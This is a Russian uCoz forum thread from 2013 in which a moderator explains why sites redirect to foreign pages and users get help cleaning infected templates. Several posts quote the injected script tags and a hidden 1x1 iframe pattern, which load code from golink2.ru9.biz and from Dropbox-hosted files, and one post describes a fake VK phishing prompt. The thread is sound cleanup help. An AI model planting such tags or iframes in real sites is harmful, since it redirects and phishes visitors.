Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта При заходе на сайт перекидывает на другой |
При заходе на сайт перекидывает на другой |
Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
Добрый вечер! У меня на сайте недавно появилась переадресация на сайт vk.com при нажатии на профиль пользователя на форуме. Так вот там написано, что мой аккаунт в вконтакте заблокирован и просят ввести номер телефона. При прямом переходе в вконтакт страница открыта. Скрипты последнее время на свой сайт не ставил, а переадресация появилась недавно. При открывании своего сайта первый же запрос идет не на мой сайт sharing-sat.ru, а на golink2.ru9.biz - это сайт как я понял по монетизации, но я первый раз его вижу и скрипты по монетизации не ставил. Кто подскажет как и где мне найти скрипт или ссылку на этот сайт, чтобы удалить его? Не понимаю как он вообще появился на моем сайте.
|
red4045, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт
Код <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> поле на что заменить оставляем пустым и производим замену во всех модулях. после очистки вы должны изменить пароль uID профиля, которым администрируете сайт. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1 |
red4045, да. обязательно смените и поставьте сложный. максимально сложный. и читайте рекомендации по ссылке
|
Добрый день!!! При входе на сайт http://zimnieradosti.ucoz.ru/ открывается дополнительное окно с http://igirgamesoft.ucoz.ru/ . у некоторых пользователей появляется порно.... . что делать? имя сервера S106 . ip 213.174.157.136
|
Валентина2869, удалите с шаблона "верхняя часть сайта" скрипты:
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script> Добавлено (15 Авг 2013, 12:53:54) |
ой....не нашла таких скрипов но если честно я профан в этом.
правильно ли я зашла-**управление дизайном**-редактирование шаблонов.? Добавлено (15 Авг 2013, 12:59:49) Добавлено (15 Авг 2013, 13:05:10) |
нет такого!!!
вот что есть |
удалила...но проблема осталась
|
Валентина2869, все осталось на своих местах
панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script> далее тоже самое делаете со скриптом Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script> если вы не способны на это, то делаем следующее панель управления - настройки - общие настройки - дизайн сайта - ставим галку на Обновить текущий дизайн во всех используемых модулях - внизу сохраняем |
спасибо!!!
|
Вот более полный список скриптов, которые нужно удалить в таком случае:
Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script> По мере нахождения новых буду дополнять. Сообщение отредактировал masterwind - Пятница, 27 Сен 2013, 12:04:09
|
| |||